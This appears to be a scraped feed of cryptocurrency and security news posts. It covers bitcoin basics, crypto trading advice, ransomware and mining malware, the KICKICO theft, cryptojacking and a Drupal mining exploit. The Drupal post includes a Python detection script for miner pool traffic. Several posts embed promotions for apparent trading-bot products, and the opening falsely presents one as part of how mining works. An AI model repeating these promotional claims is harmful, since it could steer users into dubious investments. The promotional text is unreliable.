Typically, the bitcoin network works by harnessing people's enthusiasm for the collective good. A network of tech-savvy people known as miners keeps the system honest by pouring their computing power into a blockchain, a worldwide running tally of every bitcoin transaction, and they also use Bitcoin Loophole Test software to make sure that transactions are made smoothly with maximum profits. The blockchain prevents rogues from spending the same bitcoin twice, and the miners are rewarded for their efforts with the occasional bitcoin. As long as miners keep the blockchain secure, counterfeiting should not be a problem.


Most of the trouble surrounding bitcoin occurs at the places where people store their digital funds or exchange them for conventional currencies such as dollars or pounds. If an exchange has sloppy security, or if someone's digital wallet is compromised, the funds can easily be stolen. The most prominent controversy involved the Japan-based bitcoin exchange Mt. Gox, which went offline in February 2014. Its CEO, Mark Karpeles, said thousands of bitcoins worth hundreds of millions of dollars were unaccounted for. He was arrested in July on suspicion of inflating his funds account.

How Bitcoin Came into Existence

It is a mystery. Bitcoin was launched in 2009 by a person or group of people working under the name Satoshi Nakamoto. Bitcoin was initially used by a small group of enthusiasts. Nakamoto dropped out of sight as bitcoin began to attract widespread attention. But proponents say that does not matter: the currency obeys its own internal logic.

The post A Review of How Digital Currency Technology Operates appeared first on TechWorm.

John McAfee Announces $100K Bounty To Anyone Who Can Hack His BitFi Wallet

Amidst the recent wave of crypto hacks, John McAfee gave a brave challenge to crypto hackers. It is because of

John McAfee Announces $100K Bounty To Anyone Who Can Hack His BitFi Wallet on Latest Hacking News.

3 Amazing Business Ideas in Cryptocurrency Market

Every passing day, new opportunities for cryptocurrency business open up, because so many new cryptocurrencies are being introduced to the market. Many people are interested only in investing in this industry, while many others prefer to run a proper business using these cryptocurrencies.

Here we discuss three new business ideas that you can follow to start a business in the cryptocurrency market. These ideas will help you give your business a good structure.

1. Cryptocurrency Exchange Trading

This is possibly the best cryptocurrency business idea. Owning a cryptocurrency trading website or exchange is an attractive option because it is where people come to exchange their various crypto coins. As you provide this exchange facility, you can charge a fee for each exchange or transaction.

One thing to keep in mind is that a cryptocurrency exchange business is not at all similar to the other exchange businesses already in the market. This business idea is a small setup in which only one person is involved in the whole process. The system behaves like an old-fashioned stock exchange and will face price fluctuations as well.

2. Cryptocurrency ATM

Opening a cryptocurrency ATM is a good option for doing business in this industry. Currently, there are around 2,000 cryptocurrency ATMs operating around the world. You can buy a machine and then set your commission on it. Just as people are introducing new Bitcoin trading software, such as the Bitcoin Code System, the trend of installing cryptocurrency ATMs is also becoming popular because people find them helpful.

In this business there is also third-party involvement that pushes you to use their facilities to run your ATM without risk. It is a good option for earning money simply by owning a machine that works automatically.

3. Run a Crypto Authority

Another type of business you can start in the cryptocurrency industry is to become a crypto authority. As everyone nowadays is curious about cryptocurrency, how the market works, the opportunities it offers and the kind of training one needs to start working in it, you can become a source of information for these people.

As you become an expert who knows everything about this currency, you will be able to offer consultancy and advice to people, for which you can charge money. As more people benefit from you, your market value will increase, your number of customers will grow, and ultimately your business will grow.

These are the business ideas you can use to enter the cryptocurrency industry. The cryptocurrency market offers many other business options to its users, but one must first evaluate a business structure thoroughly, and then start working on it step by step. If you jump into it immediately after someone gives you a business idea, you will probably face heavy losses and eventually step back from it.

The post 3 Amazing Business Ideas in Cryptocurrency Market appeared first on TechWorm.

5 Advice for Common Mistakes Made by Cryptocurrency Traders

When you start trading in cryptocurrency, it is certain that you will face losses as well as gains while investing and trying to make profits. The important thing is that you learn from your mistakes and make sure to avoid them in the future.

Here we are going to discuss some of the mistakes that most of the cryptocurrency traders make while dealing with cryptocurrency. The advice shared in this article will help you avoid them as you start your investments in the crypto market.

1. Wait for Price Consolidation

In the cryptocurrency industry, it is a known fact that one should buy low and sell high. Since the trader or investor does not know when a low is going to slide even lower, he must wait for price consolidation. This means that when the price starts to stabilize, or you see a chance of it going up, then attempt to buy. This lowers the risk of losses.

2. Use of Trading Bots

Most cryptocurrency traders do not bother to use trading bots because they think they can devote enough time to their cryptocurrency business. But they neglect the fact that a bot is not merely a substitute for your own work; it is an efficient and fast system. Therefore, use one reliable trading bot. As there are several available in the market, read their reviews, such as the Qprofit System Review, to make sure of their credibility.

3. Wise Response in Bad Situations

Psychologically, when a person is under stress, anxiety or depression, he is unable to make rational decisions. In the cryptocurrency business, you can suffer extreme losses that can drive you crazy. At this point, it is very important that you keep yourself calm and relaxed. Such a measured response to the situation will help you recover from that loss easily and in a short time. Otherwise, the chances are that you will make the situation even worse. So, in such situations, take your time and try to make responsible decisions.

4. Keep Control in Urgent Situations

Some people make the huge mistake of selling their position when they need money for something urgent. There is no harm in selling your position, but the mistake is doing it quickly without thinking it through. Most of the time, such steps result in a much greater loss to the trader than would otherwise have been the case.

5. Resist the Temptation to Overtrade

Most traders in the cryptocurrency business are so restless that they trade in everything as soon as they have money in their pocket. This is a very wrong way to deal with your money and your business. You should only invest when you have a great idea and conviction.

These are some of the common mistakes cryptocurrency traders make while running their business in this industry. They forget to take small things into account and get themselves into trouble. By following the advice above, you can avoid losses in your cryptocurrency business and improve your chances of profit.

The post 5 Advice for Common Mistakes Made by Cryptocurrency Traders appeared first on TechWorm.

SamSam Ransomware Attacks Extorted Nearly $6 Million

Ransomware has become a multimillion-dollar black market business for cybercriminals, and SamSam is a prime example. New research revealed that the SamSam ransomware has extorted nearly $6 million from its victims since December 2015, when the cyber gang behind the ransomware started distributing the malware in the wild. Researchers at Sophos have tracked Bitcoin addresses owned by the

New Crypto-Mining Malware ZombieBoy Exploits Multiple CVEs for Maximum Impact

ZombieBoy, a new crypto-mining family, recently clocked in at 43 KH/s — or $1,000 per month at current Monero prices.

Independent security researcher James Quinn described ZombieBoy, a new family of crypto-mining malware, in AlienVault on July 18. The name comes from the ZombieBoyTools kit the malware uses to drop its first dynamic link library (DLL) file. Much like MassMiner, ZombieBoy is a highly infectious worm, but it uses WinEggDrop rather than MassScan to identify new hosts.

Before recently shutting down one of its addresses on Monero mining pool MineXMR, the crypto-mining malware was raking in approximately $1,000 worth of the digital currency every month, according to Quinn. Based on its use of the Simplified Chinese language, ZombieBoy likely originates from China.

ZombieBoy Exploits Multiple CVEs to Beat Security Defenses

ZombieBoy leverages multiple vulnerabilities to compromise networks, including CVE-2017-9073, a remote desktop protocol (RDP) vulnerability on XP and Server 2003, and Server Message Block (SMB) exploits CVE-2017-0143 and CVE-2017-0146. It then uses DoublePulsar and EternalBlue to create multiple backdoors, both increasing the chance of compromise and making it harder for IT teams to eliminate infections.

The crypto-mining malware is encrypted with Themida and won’t run on virtual machines (VMs). This makes it hard to both capture and reverse engineer, limiting the efficacy and development of countermeasures.

ZombieBoyTools is linked to other Chinese malware like IRON TIGER APT (itself a variant of Gh0st RAT). This suggests not only persistence but also continued evolution. ZombieBoy’s double backdoors could pave the way for crypto-mining malware and leave the gate open for ransomware, keyloggers and other malicious tools.

How Can Companies Combat Crypto-Mining Malware?

While it’s tough to stop threats like ZombieBoy outright, companies can take action to limit risk. IBM security researchers recommend blocking command-and-control (C&C) traffic that exploits like DoublePulsar and EternalBlue rely on using signatures such as SMB_EternalBlue_Implant_CnC and SMB_DoublePulsar_Implant_CnC.

Security experts also recommend building intelligent, integrated immune systems capable of responding to multiple threats, including crypto-mining, ransomware and distributed denial-of-service (DDoS) attacks. This ecosystem of solutions should include two-factor authentication (2FA), advanced web application firewalls and the ability to limit or disable unused ports and services.

Source: Alien Vault


The post New Crypto-Mining Malware ZombieBoy Exploits Multiple CVEs for Maximum Impact appeared first on Security Intelligence.

KICKICO Hacked: Cybercriminal Steals $7.7 Million from ICO Platform

More bad news for cryptocurrency users. KICKICO, a blockchain-based initial coin offering (ICO) support platform, has fallen victim to a suspected cyber attack and lost more than 70 million KICK tokens (or KickCoins) worth an estimated $7.7 million. In a statement released on its Medium post on July 26, the company acknowledged the security breach, informing its customers that an

Unknown attacker runs off with $7.7 million in KickCoin after hacking 40 wallets

The cryptocurrency craze is showing no signs of stopping as exchanges and ICO (Initial Coin Offering) platforms continue to experience breaches and virtual robberies. The latest such example comes from KICKICO, whose clients lost a whopping $7.7 million in Kick tokens, or KickCoins, after getting hacked by an unknown attacker.

The firm acknowledges the attack in a July 26 post on Medium, admitting it hadn’t a clue about the breach until customers desperately called in to report losing hundreds of thousands of dollars’ worth of KickCoin (a ‘sub-species’ of the digital currency Ethereum) overnight.

“KICKICO has experienced a security breach, which resulted in the attackers gaining access to the account of the KICK smart contract — tokens of the KICKICO platform. The team learned about this incident after the complaints of several victims, who did not find tokens worth 800 thousand dollars in their wallets,” the post reads.

Apparently, the attacker avoided tripping any wires by simply destroying tokens at 40 addresses and creating tokens (in the exact corresponding amount) at another 40 addresses controlled by him. As KICKICO would normally notice such substantial and sudden shifts in funds, this method enabled the thief to fly under the radar.

An investigation into the hack revealed that the perp managed to run off with a total of 70,000,000 KICK, or the equivalent of $7.7 million at the time.

“Thanks to the rapid response of our community and our coordinated team work, we were able to regain control over the tokens and prevent further possible losses by replacing the compromised private key with the private key of the cold storage,” the firm notes.

An apologetic KICKICO encourages everyone with questions regarding the attack to contact the company through its official social channels or email ( Perhaps the best news is that all KickCoin holders who saw their wallets emptied will soon see their funds replenished.

“KICKICO guarantees to return all tokens to KickCoin holders. We apologize for the inconveniences, but claim that the situation is under control,” says KICKICO.

Google Play Store no longer accepts crypto-mining apps

Taking a leaf from Apple’s rulebook regarding cryptocurrency mining, Google has updated its Play Store guidelines to keep shady financial instruments out of its Android applications venue.

Over on the Google Play Developer Policy Center, the tech giant explicitly states: “We don’t allow apps that expose users to deceptive or harmful financial instruments.” This isn’t a new policy from the Internet behemoth. However, the company has recently made an addendum to this category.

“We don’t allow apps that mine cryptocurrency on devices. We permit apps that remotely manage the mining of cryptocurrency,” reads the newly added guideline.

In other words, Google Play will no longer be accepting any tools advertised as capable of mining virtual money using the customer’s mobile device. Google doesn’t expressly state the reasons behind its decision. However, it is reasonable to assume that the company wants to steer Android users clear of any potentially deceptive application description.

Google has yet to yank some existing crypto-mining apps from its Play Store. MinerGate Mobile Miner is perhaps the perfect example of deceptive advertising (considering the sheer processing horsepower needed to generate even a small amount of cryptocurrency). The app’s description states (emphasis ours):

“Start mining cryptocurrencies on the go! Most promising altcoins, such as Monero and Bytecoin, wallet stats and more. Make a mobile crypto fortune with MinerGate and exchange it to Bitcoin, Ethereum, Litecoin and other coins on our convenient exchange”

While MinerGate and other apps like it aren’t illegal, Google nonetheless appears keen on ridding its Android ecosystem of a potentially harmful experience. It remains to be seen how long it takes the web giant to eliminate all crypto-miners from its Play Store.

ICO hacked: Hackers steal $8 million from KICKICO Blockchain network

By Waqas

Another day, another ICO hacked. This time, KICKICO, an Initial Coin Offering (ICO) project that lets users conduct ICOs, pre-ICOs, crowdfunding and crowdinvesting campaigns have suffered a security breach and as a result, hackers have stolen more than 70 million KickCoins which is around $7.7 million. The cyber attack took place on Thursday, July 26th when hackers breached […]


Google Bans Cryptocurrency Mining Android Apps From the Play Store

Following Apple's lead in banning cryptocurrency mining apps, Google has also updated its Play Store policy this week to ban apps that mine cryptocurrencies on users' devices in the background. However, there are countless cryptocurrency mining apps, including MinerGate, AA Miner, NeoNeonMiner, and Crypto Miner, still available on the Play Store. Cryptocurrency mining is not a new concept,

What financial service providers should know about blockchain: Opportunities and threats

It seems that every few years, an advanced and innovative new technology emerges and becomes the next big thing for organizations across different industries. Take the cloud and big data, for example – during their buzzword stage, these concepts were being attached to just about everything in the tech space.

Currently, it appears that blockchain has filled this space, popping up in discussions and initiatives within all types of businesses. For financial services in particular, though, it is imperative not only to understand the basics of blockchain, but also to examine the kinds of threats and opportunities this concept will bring.

Where to start: The basics

First and foremost, financial service providers must understand what blockchain actually is. In the current industry, this can be difficult, as there is an array of different definitions available. But the main points common across expert explanations include:

  • Blockchain is the underlying technology that makes cryptocurrencies like Bitcoin possible.
  • Blockchain is a digital ledger wherein the information associated with cryptocurrency transactions is checked and verified.
  • Cryptocurrency miners doing this verification must also use powerful computer systems to solve the hash puzzle that allows verified transactions to be added to the blockchain.
  • Once a transaction is verified and the associated hash algorithm is resolved, the transaction is included in the next block of the blockchain, which is then unchangeable and part of the overall digital ledger.
  • Cryptocurrency miners receive a small digital currency profit for their efforts.

Without this system, there would be no way to verify or track the transactions taking place with digital currencies. And as new cryptocurrencies emerge, additional blockchains are established to underpin the value of the currency.

Blockchain offers certain use cases for financial service organizations.

How will blockchain impact financial services?: Opportunistic use cases

As a public ledger supporting cryptocurrency, blockchain appears to be right up financial services’ alley. At the same time, though, because anyone can review and add to a public blockchain, making it a system without a central, financial service authority, where do opportunities lie for businesses in this industry?

As Deloitte explained, there is absolutely room within this growing sector for financial service organizations to take advantage of the benefits of blockchain. A few use cases to consider include:

  • Supporting international transactions: Because blockchain enables a cryptocurrency value that is consistent across the globe, blockchain could be just the thing to enable faster and more streamlined cross-border transactions. This has traditionally been a slow and costly process, but blockchain could potentially considerably reduce the complexity involved.
  • Enabling share trading: Blockchain and cryptocurrency could also be leveraged within the stock market to allow for streamlined share trading while providing additional advantages like boosted accuracy and faster settlement.
  • Enhancing identity management: A blockchain-style system could also potentially be applied to online identity management, where users register themselves on the blockchain and can then choose who will be privy to their identity.
  • Improving loyalty rewards: Deloitte noted that banks could also utilize blockchain as a way to better trace transactions, and provide improved rewards for customer loyalty programs.

Issues to be aware of: Cryptojacking

Despite the opportunities that blockchain can provide – including impactful use cases outside of just cryptocurrency mining – there are also a few issues that financial service providers should be aware of.

First is the malicious activity that has emerged with the rising popularity of mining. As noted, in order for the blockchain to work, users must verify the information of cryptocurrency transactions, resolve a hash function and then add the transaction to the next block in the chain. Once this is performed, the cryptocurrency miner supporting this process receives a small reward for verifying and enabling the next set of transactions in the blockchain.

Unsurprisingly, cybercriminals have taken note and are now taking over victims’ systems for this purpose, an attack style now known as cryptojacking. As Trend Micro reported, cryptojacking is on the rise: Late last year, hackers enabled a campaign that impacted almost 1,500 websites, thanks to embedded cryptocurrency mining code within a live assistance widget.

Immutable nature of the blockchain

Another important aspect to understand about blockchain is the fact that transactions added to blocks in the chain are uneditable and unchangeable once verified and included in the digital ledger. This is the way the system was designed, as changing one part of a block could impact all the subsequent blocks added afterwards – similar to a long math problem, wherein a mistake early on affects all calculations that followed.

“Each block has a hash based on its contents, and carries the hash of its predecessor,” Trend Micro CISA VP of Infrastructure Strategies William Malik wrote. “So when you look at a block on a blockchain, you can trace the block back through its predecessors to the founding block. Changing the contents of a block changes the block’s hash. If a block’s hash changes, the successor blocks will no longer reference it. Rebuilding the chain with the replacement block means the hash for each successive block will have to be recalculated, which is an enormous computational task.”

And, as Malik pointed out, this part of the blockchain process could have considerable repercussions, particularly in the face of new industry regulations like the European Union’s General Data Protection Regulation (GDPR).

Blockchain and GDPR

GDPR includes several key data protection rules for EU data subjects, but is a global standard that impacts every organization that in any way does business or supports the needs of EU citizens – including U.S.-based institutions.

One rule included in the standard is the Right to be Forgotten, which states that EU citizens can request that organizations using their personal data remove this information from the record. However, as Malik noted, this could be potentially disastrous for institutions that take part in the blockchain, including financial service providers.

“Under GDPR, an organization that constructs a blockchain may have to remove a block or modify some data to comply with a request to forget someone,” Malik wrote. “GDPR does not prohibit blockchain, but it does put some procedural requirements around blockchain’s use in commercial enterprises.”

As Malik explained, one of the only ways to ensure compliance with GDPR while maintaining the integrity and accuracy of the blockchain would be to create a system that enables the dissociation of a particular identity from the relevant information included in the blockchain. In this way, data subjects can be protected and the unchangeable blockchain can persist.

Overall, blockchain is still a complex and immature, emerging technology. However, it does provide certain opportunities for financial service providers who are willing to also consider and balance these benefits with associated risks.

To find out more about blockchain and its use in financial services, connect with the experts at Trend Micro today.

The post What financial service providers should know about blockchain: Opportunities and threats appeared first on .

The trend toward cryptojacking: What it is and how businesses can prevent it

Digital attacks have evolved quite a bit in recent years. First, businesses and researchers observed a rash of ransomware, wherein encryption was exploited to lock users out of their data and files in an attempt to collect financial ransom.

Now, the next big wave in cybercriminal strategy has come, involving increasingly popular cryptocurrencies and the ability to leverage the computer power of unknowing users’ systems to mine a profit. This process is called cryptojacking – and it’s putting businesses and individual users all across the globe at potential risk.

Understanding cryptojacking: Defining the basics

Ahead of delving into this new cybercriminal process, let’s break down the underlying concepts.

Cryptojacking revolves around cryptocurrency mining, a process in which users leverage infrastructure systems and their computing power in order to verify digital transactions and reconcile associated hash function algorithms. This process enables users to create the next block of transactions in the blockchain, the digital, unchangeable ledger wherein all cryptocurrency transactions are recorded and compiled. Once a transaction is verified, the next block in the blockchain is created – once established, blocks within the blockchain and their associated transactions can not be adjusted or shifted.

“Each time a cryptocurrency transaction is made, a cryptocurrency miner is responsible for ensuring the authenticity of information and updating the blockchain with the transaction,” Webopedia explained. “The mining process itself involves competing with other cryptominers to solve complicated mathematical problems with cryptographic hash functions that are associated with a block containing the transaction data.”

The miner that is first able to solve the hash puzzle is then able to authorize the transaction and earn a small profit in cryptocurrency for adding to the blockchain. It is this competitive nature and potential for reward – despite only being a small amount per transaction – that has attracted hackers and other malicious actors to the arena.

Cryptojacking involves the fraudulent use of user systems for cryptocurrency mining.

Cryptocurrency mining vs. cryptojacking: What’s the difference?

Legitimate users, leveraging their own systems and the required specialized mining hardware, can engage in cryptocurrency mining. In fact, as noted above, the process is essential for verifying transactions hinging upon the use of cryptocurrency, and to support the continual growth of the underlying blockchain ledger.

However, there is a stark difference between legitimate and necessary cryptocurrency mining and malicious cryptojacking processes. The distinction here rests in authorized use.

Cryptocurrency miners utilize their own systems and therefore have authorized permission to leverage this computing power in order to solve the associated hash functions and create the next block of transactions in the blockchain. Those engaged in cryptojacking, on the other hand, breach and use someone else’s computing systems in an unauthorized manner.

Within cryptocurrency mining, the miner is the authorized user of the system being leveraged and reaps the small cryptocurrency reward for verifying transactions. Cryptojacking sees this reward delivered to the hacker who has broken in and is stealing the resources of another user’s systems.

As CSO contributor Michael Nadeau explained, the infection process is somewhat similar to other attack styles like ransomware.

“Hackers do this by either getting the victim to click on a malicious link in an email that loads cryptomining code on the computer, or by infecting a website or online ad with JavaScript code that auto-executes once loaded in the victim’s browser,” Nadeau wrote. “Either way, the cryptomining code then works in the background as unsuspecting victims use their computers normally.”

Once infected, users are often unaware that their systems have been leveraged for cryptojacking by an unauthorized intruder. In this way, the malicious actor can allow the cryptomining software to operate in the background and enable them to earn a profit by verifying cryptocurrency transactions.

As Nadeau pointed out, the only somewhat tell-tale sign of cryptojacking is a slowdown or lag in performance or action execution, which can also be a symptom of an array of other types of infections or system issues.

There’s a substantial difference between cryptojacking and cryptocurrency mining.

Cryptojacking campaign discovered: Infected live support platform

Concrete evidence of the rise of cryptojacking lies in the increasing discovery of infected sites spreading cryptomining software to unsuspecting visitors. Trend Micro reported on just such an instance in November 2017, wherein a considerably large cryptojacking campaign was uncovered, with a live chat and support platform at the center.

Security researchers discovered that nearly 1,500 websites that included a widget for the live chat and support platform were infected and being used for cryptocurrency mining.

“A copy of the Coinhive in-browser cryptocurrency miner was found inside a JavaScript file used by LiveHelpNow, a live chat and support platform that was being loaded on the websites,” Trend Micro reported.

This issue is worsened by the fact that the mining JavaScript does not have to be installed on the visitor’s machine – users need only visit an affected website whose LiveHelpNow widget carries the Coinhive code. Once the page loads, the mining code runs automatically in their browser.

Many of the 1,500 sites impacted by the infected LiveHelpNow widget were e-commerce companies and small, private businesses. Interestingly, attackers chose an ideal time to put the cryptomining code in place – right ahead of the busy end-of-year shopping season.

Recognizable names including Everlast were included in the list of affected websites included in this cryptojacking campaign. Other organizations’ websites – including Politifact, Showtime and even Pirate Bay – have also been impacted by cryptomining code.

“Users accessing the affected websites will see their CPU usage shoot as Coinhive script mines the Monero cryptocurrency for another party,” Trend Micro noted.

The issue for businesses: Cryptojacking prevention

While cryptojacking is certainly a prominent risk for all users, the threat could hit enterprises particularly hard. When available CPU resources are being leveraged to support cryptomining, the performance of other platforms that rely on this support will suffer. This can prevent employees from properly engaging and using company platforms and necessary software. And while cryptocurrency mining and cryptojacking are still in their infancy, now is the time for organizations to prepare and guard against this threat.

First, it’s imperative to include cryptojacking as part of security awareness training. When workers and IT department members in particular understand what to look for, they can help reduce the risk. There are also ad-blocking and anti-cryptomining extensions that can be installed within web browsers to help avoid infections.

Endpoint protection and specific, robust solutions like Trend Micro Smart Protection Suites and Worry-Free Business Security can help safeguard organizations and their users through the fast detection and blocking of malicious files and websites.

To find out more, connect with the experts at Trend Micro today.

The post The trend toward cryptojacking: What it is and how businesses can prevent it appeared first on .

IBM fixes flaw that let hackers replace its serverless code with their own

By Waqas

This is the first publicly-disclosed vulnerability in a serverless platform. Experts at IBM (The International Business Machines Corporation) have patched a critical vulnerability in its Cloud Functions which if exploited could allow remote malicious hackers to replace company’s serverless code with their own. Once the changes took effect, hackers could have extracted sensitive customer data including […]


Nicholas Weaver on Cryptocurrencies

This is well-worth reading (non-paywalled version). Here's the opening:

Cryptocurrencies, although a seemingly interesting idea, are simply not fit for purpose. They do not work as currencies, they are grossly inefficient, and they are not meaningfully distributed in terms of trust. Risks involving cryptocurrencies occur in four major areas: technical risks to participants, economic risks to participants, systemic risks to the cryptocurrency ecosystem, and societal risks.

I haven't written much about cryptocurrencies, but I share Weaver's skepticism.

Threat Actors Exploit New Drupal Flaw to Deliver Cryptocurrency Mining Malware

Back in March 2018, Drupal security teams fixed CVE-2018-7600 (also known as Drupalgeddon 2) and discovered another vulnerability (CVE-2018-7602) that could be exploited to deliver cryptocurrency mining malware in the process. Attacks against sites leveraging the open source content management system began just hours after the CVE-2018-7602 patch was released, giving site owners and operators little time to respond, Bleeping Computer reported in April 2018.

While the patch effectively curtails this crypto-mining effort, not all companies have implemented the fix.

How the Drupal Flaw Facilitates Cryptocurrency Mining

Monero mining is the aim of cybercriminals leveraging CVE-2018-7602. With 85 percent of all crypto-mining attacks now using Monero — and thieves grabbing more than $175 million from malicious mining techniques — it’s no surprise cybercriminals are exploiting this longstanding Drupal flaw to move more of the digital currency.

The method here is remote code execution (RCE), which affects Drupal versions 7 and 8. According to Trend Micro, the attack starts with a shell script download, followed by an Executable and Linkable Format (ELF) downloader to add a crontab entry. Since Drupal lacks input sanitization of # characters in URLs, threat actors can bypass standard protections to install Monero-based mining malware.

This attack vector also uses HTTP 1.0 POST to return data, making it an outlier since most organizations now use HTTP 1.1 or higher. As a result, businesses may not immediately flag this Drupal activity as suspicious.

How Critical Is the Vulnerability?

According to Drupal, this vulnerability is rated “highly critical” with a score of 20 out of 25. Attackers can leverage the flaw to take control of Drupal sites; install cryptocurrency miners and distributed denial-of-service (DDoS) malware; and create backdoors for easy, long-term access.

Threat actors are also using the Tor network to obfuscate their activity. When Trend Micro traced the attacks back along their IP trail, the endpoint was an IP address owned by a virtual private network (VPN) provider that’s also a Tor exit node.

Using open source Monero miner XMRig version 2.6.3, meanwhile, the malware checks whether potential targets are already compromised and then alters behavior to limit possible discovery, according to an IBM X-Force advisory. As a result, everything from compromised website performance to complete loss of control and ongoing vulnerability are on the table if companies are compromised.

Patching Makes Perfect

As noted by Sensors Tech Forum, CVE-2018-7602 “exists within multiple subsystems of Drupal 7.x and 8.x” and “could cause severe damage to a website, which could be hacked via remote code execution due to a missing input validation.”

To avoid potential problems, enterprises should:

  • Upgrade to Drupal 7.59 from 7.x.
  • Upgrade to Drupal 8.5.3 from 8.5.x.
  • Upgrade to Drupal 8.4.8 from 8.4.x.
  • Patch directly for 8.x or 7.x if an immediate upgrade isn’t possible (requires SA-CORE-2018-002 fix).
  • Monitor for signs of cryptocurrency mining infection, such as reduced performance and increased communications traffic that favors longer uploads and shorter downloads.
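The last bullet leaves open what "monitoring" looks like in practice. Pool-based miners such as XMRig talk to their pool over the Stratum JSON-RPC protocol, so one inexpensive network signal is the presence of Stratum method names (and miner user-agent strings) in outbound TCP payloads. The following is an added example, not code from Security Intelligence or any of the cited sources: it classifies a handful of constructed payload excerpts (not real traffic; wallet, job and result fields are placeholders) and reports the internal hosts that appear to be mining. The method list, regex and port set are this example's assumptions and will need tuning for a real environment.

```python
import json
import re
from typing import Optional

# Constructed sample of TCP payload excerpts, keyed by source, destination
# and destination port, as a capture tool or proxy log might hand them over.
SAMPLE_PAYLOADS = [
    {"src": "10.0.0.5", "dst": "203.0.113.7", "dport": 3333,
     "data": '{"id":1,"jsonrpc":"2.0","method":"login","params":'
             '{"login":"WALLET_PLACEHOLDER","pass":"x","agent":"XMRig/2.6.3"}}'},
    {"src": "10.0.0.9", "dst": "198.51.100.2", "dport": 443,
     "data": '{"id":1,"method":"mining.subscribe","params":["cpuminer/2.5.0"]}'},
    {"src": "10.0.0.12", "dst": "192.0.2.10", "dport": 443,
     "data": '{"id":7,"method":"getUpdates","params":{}}'},
    {"src": "10.0.0.12", "dst": "192.0.2.10", "dport": 80,
     "data": "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n"},
    {"src": "10.0.0.5", "dst": "203.0.113.7", "dport": 3333,
     "data": '{"id":2,"jsonrpc":"2.0","method":"submit","params":'
             '{"id":"1","job_id":"JOB_PLACEHOLDER","nonce":"00000000","result":"RESULT_PLACEHOLDER"}}'},
]

STRATUM_METHODS = {
    "login", "submit", "getjob",                                   # CryptoNight-style Stratum (XMRig)
    "mining.subscribe", "mining.authorize", "mining.submit", "mining.notify",  # Stratum v1
}
MINER_AGENT_RE = re.compile(r"xmrig|cpuminer|minerd|ccminer|cryptonight", re.IGNORECASE)
COMMON_POOL_PORTS = {3333, 4444, 5555, 7777, 8888, 14444}   # assumption: frequently seen pool ports


def classify_payload(data: str) -> Optional[list]:
    """Return the reasons a payload looks like pool-mining traffic, or None."""
    try:
        msg = json.loads(data)
    except json.JSONDecodeError:
        return None            # not JSON-RPC, so not Stratum
    if not isinstance(msg, dict):
        return None
    reasons = []
    method = msg.get("method")
    if method in STRATUM_METHODS:
        reasons.append(f"stratum method {method!r}")
    agent = MINER_AGENT_RE.search(data)
    if agent:
        reasons.append(f"miner user-agent {agent.group(0)!r}")
    return reasons or None


def detect_mining(records):
    """One alert per suspicious payload; the port is added as supporting context."""
    alerts = []
    for r in records:
        reasons = classify_payload(r["data"])
        if not reasons:
            continue
        if r["dport"] in COMMON_POOL_PORTS:
            reasons.append(f"common pool port {r['dport']}")
        alerts.append({"src": r["src"], "dst": r["dst"], "dport": r["dport"], "reasons": reasons})
    return alerts


def mining_hosts(records) -> set:
    """Internal hosts worth pulling for triage."""
    return {a["src"] for a in detect_mining(records)}


if __name__ == "__main__":
    for alert in detect_mining(SAMPLE_PAYLOADS):
        print(alert)
    print("hosts:", sorted(mining_hosts(SAMPLE_PAYLOADS)))
```

Note that `login` and `submit` are generic method names, which is why the example reports reasons rather than a verdict: a method hit plus a known miner agent or a pool port is a strong signal, a bare `submit` on port 443 is a lead. Payload inspection also only works where the pool connection is not encrypted; where it is, fall back to the destination-based and host-based signals the text mentions (CPU load, unexpected long-lived outbound connections).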

Sources: Bleeping Computer, Trend Micro, Drupal, Sensors Tech Forum

The post Threat Actors Exploit New Drupal Flaw to Deliver Cryptocurrency Mining Malware appeared first on Security Intelligence.

Blocking Cryptocurrency Mining with Cisco Talos

The value of cryptocurrencies has fluctuated wildly, but the value is still high enough to garner a lot of attention, both legitimate and malicious. Most of the malicious activity we see is done for financial gain, and cryptocurrencies have provided attackers with a lucrative new avenue to pursue: cryptocurrency mining.

Over the past year, we have seen a seismic shift in the threat landscape with the explosive growth of malicious cryptocurrency mining. This threat is spreading across the internet like wildfire and is being delivered through multiple vectors including email, web, and active exploitation. That doesn't include the quasi-legitimate in-browser mining that is becoming increasingly common.

Generally speaking, cryptocurrency mining can use up a considerable amount of computing power and energy that would otherwise be incredibly valuable to any organization. Enterprises need to start making tough policy decisions regarding cryptocurrency mining. It is common for end users to try and generate additional revenue by installing miners on their desktop and mining off-hours. This type of activity needs to be addressed by the enterprise. However, it will be detected along with malicious cryptocurrency mining in the environment.

To understand the different ways to block cryptocurrency mining, you need to know how pool-based mining works and how adversaries take advantage of it. Mining on a single standalone system is not an effective way to generate significant revenue and, once electricity usage is factored in, does not make sense for the average user to pursue.

However, if you have a large block of systems and leverage pool-based mining, the profits can add up, and adversaries have noticed. Malicious actors have pivoted and started using open-source cryptocurrency miners. The ability to quickly deploy these miners without requiring true command and control access has made them incredibly attractive. The results have been stunning. We have seen massive campaigns generating hundreds of thousands, if not millions of dollars, for the attackers. The size and scale of this problem are just starting to come into focus and looks to be worsening in the near term. This brings us to the challenge of detection.

Since these miners rely on both end systems and network traffic to operate, it creates many different avenues for detection. Cisco Talos is releasing a whitepaper that provides a high-level overview of what malicious cryptocurrency mining is and the plethora of different ways that Cisco Talos goes about blocking it. This includes technologies like Cisco Intrusion Prevention System (IPS), Advanced Malware Protection (AMP), Umbrella, and Threat Grid, among others.

For the full details of all the methods and technologies Cisco Talos uses to thwart this threat, download the full whitepaper here.

How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape: The Growth of Miners

Cyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This interest has increased in recent years, stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. These operations include malicious cryptocurrency mining (also referred to as cryptojacking), the collection of cryptocurrency wallet credentials, extortion activity, and the targeting of cryptocurrency exchanges.

This blog post discusses the various trends that we have been observing related to cryptojacking activity, including cryptojacking modules being added to popular malware families, an increase in drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, cryptojacking as a threat to critical infrastructure, and observed distribution mechanisms.

What Is Mining?

